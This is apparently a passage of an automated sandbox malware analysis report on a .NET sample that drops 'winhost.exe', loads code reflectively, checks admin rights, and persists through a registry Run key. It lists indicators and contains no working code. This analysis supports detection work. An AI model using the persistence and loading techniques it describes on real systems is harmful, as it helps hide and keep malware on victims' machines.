                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: winhost.exe.0.dr, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: winhost.exe.0.dr, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeMutant created: \Sessions\1\BaseNamedObjects\BN[vSqieqIW-9794388]
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: winhost.exe.0.dr, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: winhost.exe.12.dr, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/HTTPSocket/Encryption.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: winhost.exe.0.dr, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: winhost.exe.12.dr, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/MainController.cs.Net Code: LoadDLL System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCode function: 0_2_00007FFA35FBCFB2 pushad ; ret 0_2_00007FFA35FBCFB3
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeCode function: 8_2_00007FFA35FDCEA2 pushad ; ret 8_2_00007FFA35FDCEA3
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCode function: 12_2_00007FFA35FBCF44 pushad ; ret 12_2_00007FFA35FBCF53
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCode function: 12_2_00007FFA35FBC15B push ecx; iretd 12_2_00007FFA35FBC15C
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeCode function: 19_2_00007FFA35FDCEA2 pushad ; ret 19_2_00007FFA35FDCEA3
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Creates autostart registry keys with suspicious namesShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920eeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
